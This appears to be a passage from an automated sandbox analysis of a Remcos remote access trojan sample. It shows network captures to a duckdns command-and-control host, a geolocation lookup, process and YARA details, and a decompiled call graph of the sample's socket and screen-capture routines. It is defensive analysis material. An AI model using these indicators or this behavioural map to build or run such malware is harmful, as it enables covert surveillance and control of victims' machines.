                              May 3, 2024 00:36:04.131050110 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:36:04.271764040 CEST88894970285.60.29.68192.168.2.7
                              May 3, 2024 00:36:04.277808905 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:04.277895927 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:04.282496929 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:04.506237030 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:05.057044029 CEST497028889192.168.2.785.60.29.68
                              May 3, 2024 00:36:05.245914936 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:05.287278891 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:05.298032999 CEST88894970285.60.29.68192.168.2.7
                              May 3, 2024 00:36:05.390862942 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:05.572920084 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:05.574073076 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:05.756052971 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:05.781913042 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:05.965328932 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:06.074960947 CEST497028889192.168.2.785.60.29.68
                              May 3, 2024 00:36:06.265201092 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:06.319127083 CEST88894970285.60.29.68192.168.2.7
                              May 3, 2024 00:36:06.374522924 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:06.585892916 CEST497038889192.168.2.785.60.29.68
                              May 3, 2024 00:36:06.768230915 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:06.949251890 CEST88894970085.60.29.68192.168.2.7
                              May 3, 2024 00:36:07.162323952 CEST497008889192.168.2.785.60.29.68
                              May 3, 2024 00:36:09.611807108 CEST88894970285.60.29.68192.168.2.7
                              May 3, 2024 00:36:09.614541054 CEST88894970385.60.29.68192.168.2.7
                              May 3, 2024 00:36:12.293354988 CEST497008889192.168.2.785.60.29.68

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 3, 2024 00:35:55.789414883 CEST6128653192.168.2.71.1.1.1
                              May 3, 2024 00:35:55.894139051 CEST53612861.1.1.1192.168.2.7
                              May 3, 2024 00:35:56.941400051 CEST5954253192.168.2.71.1.1.1
                              May 3, 2024 00:35:57.032411098 CEST53595421.1.1.1192.168.2.7

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              May 3, 2024 00:35:55.789414883 CEST192.168.2.71.1.1.10x7c55Standard query (0)sendfiletiahforem.duckdns.orgA (IP address)IN (0x0001)false
                              May 3, 2024 00:35:56.941400051 CEST192.168.2.71.1.1.10x3847Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              May 3, 2024 00:35:55.894139051 CEST1.1.1.1192.168.2.70x7c55No error (0)sendfiletiahforem.duckdns.org85.60.29.68A (IP address)IN (0x0001)false
                              May 3, 2024 00:35:57.032411098 CEST1.1.1.1192.168.2.70x3847No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • geoplugin.net

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749701178.237.33.5080524C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              TimestampBytes transferredDirectionData
                              May 3, 2024 00:35:57.214010000 CEST71OUTGET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
                              May 3, 2024 00:35:57.381263018 CEST1173INHTTP/1.1 200 OK
                              date: Thu, 02 May 2024 22:35:57 GMT
                              server: Apache
                              content-length: 965
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                              Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:00:35:54
                              Start date:03/05/2024
                              Path:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\xi0TpAxHGMsm.exe"
                              Imagebase:0x400000
                              File size:494'080 bytes
                              MD5 hash:EFFE954DA69F8377295E43C84E48BD77
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:12
                              Start time:00:36:06
                              Start date:03/05/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
                              Imagebase:0xdd0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:5.3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:17.9%
                                Total number of Nodes:1827
                                Total number of Limit Nodes:52
                                execution_graph 47167 4161b3 47211 401e65 47167->47211 47169 4161be 47216 43baac 47169->47216 47172 401e65 22 API calls 47173 4161d9 47172->47173 47220 4020f6 47173->47220 47175 4161e3 47176 4161fb 47175->47176 47177 41622a 47175->47177 47179 401e65 22 API calls 47176->47179 47178 401e65 22 API calls 47177->47178 47180 41622f 47178->47180 47181 416200 47179->47181 47182 4020f6 28 API calls 47180->47182 47183 4020f6 28 API calls 47181->47183 47184 41623a 47182->47184 47185 41620b 47183->47185 47186 4020f6 28 API calls 47184->47186 47187 4020f6 28 API calls 47185->47187 47189 416249 47186->47189 47188 41621a 47187->47188 47273 41876f 47188->47273 47191 41876f 201 API calls 47189->47191 47192 416226 47191->47192 47193 401e65 22 API calls 47192->47193 47194 416263 47193->47194 47195 43baac _strftime 40 API calls 47194->47195 47196 416270 47195->47196 47197 401e65 22 API calls 47196->47197 47198 416285 47197->47198 47199 43baac _strftime 40 API calls 47198->47199 47200 416292 47199->47200 47226 41893c 47200->47226 47203 417089 47337 401e8d 47203->47337 47207 401fd8 11 API calls 47208 41709e 47207->47208 47209 401fd8 11 API calls 47208->47209 47210 4170aa 47209->47210 47212 401e6d 47211->47212 47213 401e75 47212->47213 47343 402158 22 API calls 47212->47343 47213->47169 47217 43bac5 _strftime 47216->47217 47344 43ae03 47217->47344 47219 4161cb 47219->47172 47221 40210c 47220->47221 47372 4023ce 47221->47372 47223 402126 47376 402569 47223->47376 47225 402134 47225->47175 47424 402093 47226->47424 47230 418971 47231 418980 47230->47231 47232 41899f 47230->47232 47234 4020f6 28 API calls 47231->47234 47479 4020df 47232->47479 47236 418991 47234->47236 47237 404aa1 61 API calls 47236->47237 47240 41899a 47237->47240 47238 4189dd 47483 418a92 47238->47483 47239 4189ac 47525 418c4c 69 API calls 47239->47525 47245 401fd8 11 API calls 47240->47245 47243 4189ca 47526 401fe2 47243->47526 47249 418a7f 47245->47249 47247 401fe2 28 API calls 47248 4189f6 47247->47248 47251 401fd8 11 API calls 47248->47251 47252 401fd8 11 API calls 47249->47252 47255 4189db 47251->47255 47254 41629b 47252->47254 47253 401fd8 11 API calls 47253->47255 47254->47203 47334 401fd8 47254->47334 47496 41bdf6 47255->47496 47262 402f10 28 API calls 47263 418a48 47262->47263 47510 404aa1 47263->47510 47266 401fd8 11 API calls 47267 418a5c 47266->47267 47268 401fd8 11 API calls 47267->47268 47269 418a64 47268->47269 47270 401fd8 11 API calls 47269->47270 47271 418a6f 47270->47271 47272 401fd8 11 API calls 47271->47272 47272->47240 47639 401fc0 47273->47639 47276 401fc0 28 API calls 47277 4187a0 47276->47277 47278 4187c5 ___scrt_get_show_window_mode 47277->47278 47279 4187b6 GdiplusStartup 47277->47279 47643 4194c4 47278->47643 47279->47278 47286 418810 47663 418e48 DeleteDC 47286->47663 47289 418815 47664 40482d 47289->47664 47291 41881c 47292 418820 47291->47292 47671 4048c8 connect 47291->47671 47295 404e26 99 API calls 47292->47295 47297 418837 47295->47297 47296 41883c 47731 404be5 CreateThread 47296->47731 47300 401fd8 11 API calls 47297->47300 47299 418846 47303 4188e1 47299->47303 47304 41885e 47299->47304 47301 418924 47300->47301 47302 401fd8 11 API calls 47301->47302 47305 418930 47302->47305 47732 402f31 47303->47732 47750 41bcbe 28 API calls 47304->47750 47305->47192 47308 4188f9 47310 402f10 28 API calls 47308->47310 47309 418865 47751 41bb8e 47309->47751 47312 418903 47310->47312 47314 404aa1 61 API calls 47312->47314 47318 4188df 47314->47318 47315 402f31 28 API calls 47316 41888d 47315->47316 47756 402ea1 47316->47756 47320 401fd8 11 API calls 47318->47320 47320->47297 47321 402f10 28 API calls 47322 4188a5 47321->47322 47323 402ea1 28 API calls 47322->47323 47324 4188af 47323->47324 47325 404aa1 61 API calls 47324->47325 47326 4188b9 47325->47326 47327 401fd8 11 API calls 47326->47327 47328 4188c4 47327->47328 47329 401fd8 11 API calls 47328->47329 47330 4188cd 47329->47330 47331 401fd8 11 API calls 47330->47331 47332 4188d6 47331->47332 47333 401fd8 11 API calls 47332->47333 47333->47318 47335 4023ce 11 API calls 47334->47335 47336 401fe1 47335->47336 47336->47203 47339 402163 47337->47339 47338 40219f 47338->47207 47339->47338 48164 402730 11 API calls 47339->48164 47341 402184 48165 402712 11 API calls std::_Deallocate 47341->48165 47360 43ba0a 47344->47360 47346 43ae50 47366 43a7b7 36 API calls 2 library calls 47346->47366 47347 43ae15 47347->47346 47348 43ae2a 47347->47348 47351 43ae2f __cftof 47347->47351 47365 4405dd 20 API calls _abort 47348->47365 47351->47219 47353 43ae5c 47354 43ae8b 47353->47354 47367 43ba4f 40 API calls __Tolower 47353->47367 47356 43aef7 47354->47356 47368 43b9b6 20 API calls 2 library calls 47354->47368 47369 43b9b6 20 API calls 2 library calls 47356->47369 47358 43afbe _strftime 47358->47351 47370 4405dd 20 API calls _abort 47358->47370 47361 43ba22 47360->47361 47362 43ba0f 47360->47362 47361->47347 47371 4405dd 20 API calls _abort 47362->47371 47364 43ba14 __cftof 47364->47347 47365->47351 47366->47353 47367->47353 47368->47356 47369->47358 47370->47351 47371->47364 47373 402428 47372->47373 47374 4023d8 47372->47374 47373->47223 47374->47373 47386 4027a7 47374->47386 47397 402888 47376->47397 47378 40257d 47379 402592 47378->47379 47380 4025a7 47378->47380 47402 402a34 22 API calls 47379->47402 47404 4028e8 47380->47404 47383 40259b 47403 4029da 22 API calls 47383->47403 47385 4025a5 47385->47225 47387 402e21 47386->47387 47390 4016b4 47387->47390 47389 402e30 47389->47373 47391 4016c6 47390->47391 47392 4016cb 47390->47392 47396 43bd19 11 API calls _abort 47391->47396 47392->47391 47393 4016f3 47392->47393 47393->47389 47395 43bd18 47396->47395 47398 402890 47397->47398 47399 402898 47398->47399 47415 402ca3 22 API calls 47398->47415 47399->47378 47402->47383 47403->47385 47405 4028f1 47404->47405 47406 402953 47405->47406 47407 4028fb 47405->47407 47422 4028a4 22 API calls 47406->47422 47410 402904 47407->47410 47412 402917 47407->47412 47416 402cae 47410->47416 47413 402915 47412->47413 47414 4023ce 11 API calls 47412->47414 47413->47385 47414->47413 47417 402cb8 __EH_prolog 47416->47417 47423 402e54 22 API calls 47417->47423 47419 4023ce 11 API calls 47421 402d92 47419->47421 47420 402d24 47420->47419 47421->47413 47423->47420 47425 40209b 47424->47425 47426 4023ce 11 API calls 47425->47426 47427 4020a6 47426->47427 47535 4024ed 47427->47535 47430 418e76 CreateDCA CreateCompatibleDC 47546 419325 47430->47546 47432 418eb1 47433 418ed8 47432->47433 47551 419367 GetMonitorInfoW 47432->47551 47435 418f36 47433->47435 47549 41939d GetMonitorInfoW 47433->47549 47436 402093 28 API calls 47435->47436 47478 418f42 47436->47478 47439 418f23 DeleteDC DeleteDC 47441 418f30 DeleteObject 47439->47441 47440 418f4f SelectObject 47442 418f6a StretchBlt 47440->47442 47456 418f5b DeleteDC DeleteDC 47440->47456 47441->47435 47444 418f93 47442->47444 47442->47456 47445 419014 47444->47445 47446 418f9a GetCursorInfo 47444->47446 47448 41905e GetObjectA 47445->47448 47450 419027 BitBlt 47445->47450 47451 41904e 47445->47451 47446->47445 47447 418fb1 GetIconInfo 47446->47447 47447->47445 47449 418fc7 DeleteObject DeleteObject DrawIcon 47447->47449 47452 419076 LocalAlloc 47448->47452 47448->47456 47449->47445 47450->47448 47451->47448 47454 419119 GlobalAlloc 47452->47454 47455 41910f 47452->47455 47454->47456 47457 41915b GetDIBits 47454->47457 47455->47454 47456->47441 47458 419172 DeleteDC DeleteDC DeleteObject GlobalFree 47457->47458 47459 419198 47457->47459 47458->47435 47460 4020df 11 API calls 47459->47460 47461 4191d4 47460->47461 47462 4020df 11 API calls 47461->47462 47463 4191e0 47462->47463 47464 40250a 28 API calls 47463->47464 47465 4191f0 47464->47465 47466 40250a 28 API calls 47465->47466 47467 41920d 47466->47467 47468 40250a 28 API calls 47467->47468 47469 41922f 47468->47469 47470 419240 DeleteObject GlobalFree DeleteDC 47469->47470 47471 419262 DeleteDC 47470->47471 47472 419265 47470->47472 47471->47472 47552 402055 47472->47552 47475 401fd8 11 API calls 47476 419280 47475->47476 47477 401fd8 11 API calls 47476->47477 47477->47478 47478->47230 47480 4020e7 47479->47480 47481 4023ce 11 API calls 47480->47481 47482 4020f2 47481->47482 47482->47238 47482->47239 47484 418ab5 47483->47484 47485 418abd SHCreateMemStream 47484->47485 47564 418656 GdipLoadImageFromStream 47485->47564 47487 418ad1 47565 41928e 47487->47565 47489 418adf SHCreateMemStream 47572 4186cb GdipSaveImageToStream 47489->47572 47491 418b27 47574 40520c 47491->47574 47493 418b40 47580 418679 GdipDisposeImage 47493->47580 47495 4189ec 47495->47247 47497 41be01 47496->47497 47498 402093 28 API calls 47497->47498 47499 418a27 47497->47499 47498->47499 47500 406362 47499->47500 47609 403365 47500->47609 47502 406370 47503 402055 11 API calls 47502->47503 47504 40637f 47503->47504 47505 402f10 47504->47505 47624 401fb0 47505->47624 47507 402f1e 47508 402055 11 API calls 47507->47508 47509 402f2d 47508->47509 47509->47262 47511 404ab4 47510->47511 47512 40520c 28 API calls 47511->47512 47513 404ac9 ctype 47512->47513 47514 404b40 WaitForSingleObject 47513->47514 47515 404b20 47513->47515 47516 404b56 47514->47516 47517 404b32 send 47515->47517 47637 42103a 54 API calls 47516->47637 47519 404b7b 47517->47519 47521 401fd8 11 API calls 47519->47521 47520 404b69 SetEvent 47520->47519 47522 404b83 47521->47522 47523 401fd8 11 API calls 47522->47523 47524 404b8b 47523->47524 47524->47266 47525->47243 47527 401ff1 47526->47527 47534 402039 47526->47534 47528 4023ce 11 API calls 47527->47528 47529 401ffa 47528->47529 47530 40203c 47529->47530 47531 402015 47529->47531 47532 40267a 11 API calls 47530->47532 47638 403098 28 API calls 47531->47638 47532->47534 47534->47253 47536 4024f9 47535->47536 47539 40250a 47536->47539 47538 4020b1 47538->47430 47540 40251a 47539->47540 47541 402520 47540->47541 47542 402535 47540->47542 47544 402569 28 API calls 47541->47544 47543 4028e8 28 API calls 47542->47543 47545 402533 47543->47545 47544->47545 47545->47538 47558 436e90 47546->47558 47550 418f0d CreateCompatibleBitmap 47549->47550 47550->47439 47550->47440 47551->47433 47553 402061 47552->47553 47554 4023ce 11 API calls 47553->47554 47555 40207b 47554->47555 47560 40267a 47555->47560 47559 419343 EnumDisplaySettingsW 47558->47559 47559->47432 47561 40268b 47560->47561 47562 4023ce 11 API calls 47561->47562 47563 40208d 47562->47563 47563->47475 47564->47487 47581 418714 GdipGetImageEncodersSize 47565->47581 47567 4192b0 47570 4192b6 47567->47570 47582 43bd51 47567->47582 47570->47489 47573 4186eb 47572->47573 47573->47491 47575 405214 47574->47575 47576 4023ce 11 API calls 47575->47576 47577 40521f 47576->47577 47592 405234 47577->47592 47579 40522e 47579->47493 47580->47495 47581->47567 47587 446137 __Getctype 47582->47587 47583 446175 47591 4405dd 20 API calls _abort 47583->47591 47584 446160 RtlAllocateHeap 47586 4192c5 47584->47586 47584->47587 47586->47570 47589 41871d GdipGetImageEncoders 47586->47589 47587->47583 47587->47584 47590 442f80 7 API calls 2 library calls 47587->47590 47589->47570 47590->47587 47591->47586 47593 405240 47592->47593 47594 40526e 47592->47594 47595 4028e8 28 API calls 47593->47595 47608 4028a4 22 API calls 47594->47608 47598 40524a 47595->47598 47598->47579 47612 403850 47609->47612 47611 403373 47611->47502 47613 402888 22 API calls 47612->47613 47614 40385c 47613->47614 47615 402888 22 API calls 47614->47615 47616 40386a 47615->47616 47617 403893 47616->47617 47618 40391e 47616->47618 47621 4028e8 28 API calls 47617->47621 47622 4038a5 47617->47622 47623 4028a4 22 API calls 47618->47623 47621->47622 47622->47611 47627 4025f0 47624->47627 47626 401fbd 47626->47507 47628 402888 22 API calls 47627->47628 47629 402602 47628->47629 47630 402672 47629->47630 47632 402629 47629->47632 47636 4028a4 22 API calls 47630->47636 47634 4028e8 28 API calls 47632->47634 47635 40263b 47632->47635 47634->47635 47635->47626 47637->47520 47638->47534 47640 401fd2 47639->47640 47641 401fc9 47639->47641 47640->47276 47765 4025e0 28 API calls 47641->47765 47766 401f86 47643->47766 47646 419507 47647 4187ed 47646->47647 47650 401f09 11 API calls 47646->47650 47770 40417e 47646->47770 47776 403014 47646->47776 47651 401f13 47647->47651 47650->47646 47652 401f22 47651->47652 47653 401f6a 47651->47653 47654 402252 11 API calls 47652->47654 47660 401f09 47653->47660 47655 401f2b 47654->47655 47656 401f6d 47655->47656 47657 401f46 47655->47657 47658 402336 11 API calls 47656->47658 47858 40305c 28 API calls 47657->47858 47658->47653 47661 402252 11 API calls 47660->47661 47662 401f12 47661->47662 47662->47286 47737 404e26 WaitForSingleObject 47662->47737 47663->47289 47665 404846 socket 47664->47665 47666 404839 47664->47666 47668 404860 CreateEventW 47665->47668 47669 404842 47665->47669 47859 40489e WSAStartup 47666->47859 47668->47291 47669->47291 47670 40483e 47670->47665 47670->47669 47672 404a1b 47671->47672 47673 4048ee 47671->47673 47674 40497e 47672->47674 47675 404a21 WSAGetLastError 47672->47675 47673->47674 47697 404923 47673->47697 47860 40531e 47673->47860 47674->47292 47674->47296 47675->47674 47676 404a31 47675->47676 47678 404a36 47676->47678 47687 404932 47676->47687 47894 41cae1 30 API calls 47678->47894 47680 40490f 47684 402093 28 API calls 47680->47684 47682 40492b 47686 404941 47682->47686 47682->47687 47683 402093 28 API calls 47688 404a80 47683->47688 47689 40491e 47684->47689 47685 404a40 47895 4052fd 28 API calls 47685->47895 47694 404950 47686->47694 47695 404987 47686->47695 47687->47683 47691 402093 28 API calls 47688->47691 47865 41b4ef 47689->47865 47696 404a8f 47691->47696 47699 402093 28 API calls 47694->47699 47891 421a40 54 API calls 47695->47891 47700 41b4ef 80 API calls 47696->47700 47889 420c60 27 API calls 47697->47889 47703 40495f 47699->47703 47700->47674 47706 402093 28 API calls 47703->47706 47704 40498f 47707 4049c4 47704->47707 47708 404994 47704->47708 47710 40496e 47706->47710 47893 420e06 28 API calls 47707->47893 47712 402093 28 API calls 47708->47712 47715 41b4ef 80 API calls 47710->47715 47714 4049a3 47712->47714 47717 402093 28 API calls 47714->47717 47718 404973 47715->47718 47716 4049cc 47719 4049f9 CreateEventW CreateEventW 47716->47719 47721 402093 28 API calls 47716->47721 47720 4049b2 47717->47720 47890 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47718->47890 47719->47674 47722 41b4ef 80 API calls 47720->47722 47724 4049e2 47721->47724 47725 4049b7 47722->47725 47726 402093 28 API calls 47724->47726 47892 4210b2 52 API calls 47725->47892 47728 4049f1 47726->47728 47729 41b4ef 80 API calls 47728->47729 47730 4049f6 47729->47730 47730->47719 47731->47299 47922 404c01 47731->47922 47733 4020df 11 API calls 47732->47733 47734 402f3d 47733->47734 47735 4032a0 28 API calls 47734->47735 47736 402f59 47735->47736 47736->47308 47738 404e40 SetEvent CloseHandle 47737->47738 47739 404e57 closesocket 47737->47739 47740 404ed8 47738->47740 47741 404e64 47739->47741 47740->47286 47742 404e7a 47741->47742 48152 4050e4 84 API calls 47741->48152 47744 404e8c WaitForSingleObject 47742->47744 47745 404ece SetEvent CloseHandle 47742->47745 48153 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47744->48153 47745->47740 47747 404e9b SetEvent WaitForSingleObject 48154 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47747->48154 47749 404eb3 SetEvent CloseHandle CloseHandle 47749->47745 47750->47309 48155 441e81 47751->48155 47754 402093 28 API calls 47755 418880 47754->47755 47755->47315 47760 402eb0 47756->47760 47757 402ef2 47758 401fb0 28 API calls 47757->47758 47759 402ef0 47758->47759 47761 402055 11 API calls 47759->47761 47760->47757 47763 402ee7 47760->47763 47762 402f09 47761->47762 47762->47321 47764 403365 28 API calls 47763->47764 47764->47759 47765->47640 47767 401f8e 47766->47767 47781 402252 47767->47781 47769 401f99 EnumDisplayMonitors 47769->47646 47771 404186 47770->47771 47772 402252 11 API calls 47771->47772 47773 404191 47772->47773 47786 4041bc 47773->47786 47822 403222 47776->47822 47778 403022 47826 403262 47778->47826 47782 4022ac 47781->47782 47783 40225c 47781->47783 47782->47769 47783->47782 47785 402779 11 API calls std::_Deallocate 47783->47785 47785->47782 47787 4041c8 47786->47787 47790 4041d9 47787->47790 47789 40419c 47789->47646 47791 4041e9 47790->47791 47792 404206 47791->47792 47793 4041ef 47791->47793 47807 4027e6 47792->47807 47797 404267 47793->47797 47796 404204 47796->47789 47798 402888 22 API calls 47797->47798 47799 40427b 47798->47799 47800 404290 47799->47800 47801 4042a5 47799->47801 47818 4042df 22 API calls 47800->47818 47803 4027e6 28 API calls 47801->47803 47806 4042a3 47803->47806 47804 404299 47819 402c48 22 API calls 47804->47819 47806->47796 47808 4027ef 47807->47808 47809 402851 47808->47809 47810 4027f9 47808->47810 47821 4028a4 22 API calls 47809->47821 47813 402802 47810->47813 47814 402815 47810->47814 47820 402aea 28 API calls __EH_prolog 47813->47820 47816 402813 47814->47816 47817 402252 11 API calls 47814->47817 47816->47796 47817->47816 47818->47804 47819->47806 47820->47816 47823 40322e 47822->47823 47832 403618 47823->47832 47825 40323b 47825->47778 47827 40326e 47826->47827 47828 402252 11 API calls 47827->47828 47829 403288 47828->47829 47854 402336 47829->47854 47833 403626 47832->47833 47834 403644 47833->47834 47835 40362c 47833->47835 47837 40365c 47834->47837 47838 40369e 47834->47838 47843 4036a6 47835->47843 47841 4027e6 28 API calls 47837->47841 47842 403642 47837->47842 47852 4028a4 22 API calls 47838->47852 47841->47842 47842->47825 47844 402888 22 API calls 47843->47844 47845 4036b9 47844->47845 47846 40372c 47845->47846 47847 4036de 47845->47847 47853 4028a4 22 API calls 47846->47853 47850 4027e6 28 API calls 47847->47850 47851 4036f0 47847->47851 47850->47851 47851->47842 47855 402347 47854->47855 47856 402252 11 API calls 47855->47856 47857 4023c7 47856->47857 47857->47646 47858->47653 47859->47670 47861 4020df 11 API calls 47860->47861 47862 40532a 47861->47862 47896 4032a0 47862->47896 47864 405346 47864->47680 47866 41b5a0 47865->47866 47867 41b505 GetLocalTime 47865->47867 47869 401fd8 11 API calls 47866->47869 47868 40531e 28 API calls 47867->47868 47870 41b547 47868->47870 47871 41b5a8 47869->47871 47900 406383 47870->47900 47873 401fd8 11 API calls 47871->47873 47875 41b5b0 47873->47875 47875->47697 47876 402f10 28 API calls 47877 41b55f 47876->47877 47878 406383 28 API calls 47877->47878 47879 41b56b 47878->47879 47905 407200 77 API calls 47879->47905 47881 41b579 47882 401fd8 11 API calls 47881->47882 47883 41b585 47882->47883 47884 401fd8 11 API calls 47883->47884 47885 41b58e 47884->47885 47886 401fd8 11 API calls 47885->47886 47887 41b597 47886->47887 47888 401fd8 11 API calls 47887->47888 47888->47866 47889->47682 47890->47674 47891->47704 47892->47718 47893->47716 47894->47685 47897 4032aa 47896->47897 47898 4028e8 28 API calls 47897->47898 47899 4032c9 47897->47899 47898->47899 47899->47864 47906 4051ef 47900->47906 47902 406391 47903 402055 11 API calls 47902->47903 47904 4063a0 47903->47904 47904->47876 47905->47881 47907 4051fb 47906->47907 47910 405274 47907->47910 47909 405208 47909->47902 47911 405282 47910->47911 47912 405288 47911->47912 47913 40529e 47911->47913 47916 4025f0 28 API calls 47912->47916 47914 4052f5 47913->47914 47915 4052b6 47913->47915 47921 4028a4 22 API calls 47914->47921 47918 4028e8 28 API calls 47915->47918 47920 40529c 47915->47920 47916->47920 47918->47920 47920->47909 47925 404c10 47922->47925 47926 4020df 11 API calls 47925->47926 47927 404c27 47926->47927 47928 4020df 11 API calls 47927->47928 47937 404c30 47928->47937 47929 43bd51 new 21 API calls 47929->47937 47932 404ca1 47934 404e26 99 API calls 47932->47934 47933 401fe2 28 API calls 47933->47937 47936 404ca8 47934->47936 47935 401fd8 11 API calls 47935->47937 47938 401fd8 11 API calls 47936->47938 47937->47929 47937->47932 47937->47933 47937->47935 47943 404b96 47937->47943 47949 4020b7 47937->47949 47955 404cc3 47937->47955 47939 404cb1 47938->47939 47940 401fd8 11 API calls 47939->47940 47941 404c0f 47940->47941 47944 404ba0 WaitForSingleObject 47943->47944 47945 404bcd recv 47943->47945 47968 421076 54 API calls 47944->47968 47946 404be0 47945->47946 47946->47937 47948 404bbc SetEvent 47948->47946 47950 4020bf 47949->47950 47951 4023ce 11 API calls 47950->47951 47952 4020ca 47951->47952 47953 40250a 28 API calls 47952->47953 47954 4020d9 47953->47954 47954->47937 47956 4020df 11 API calls 47955->47956 47964 404cde 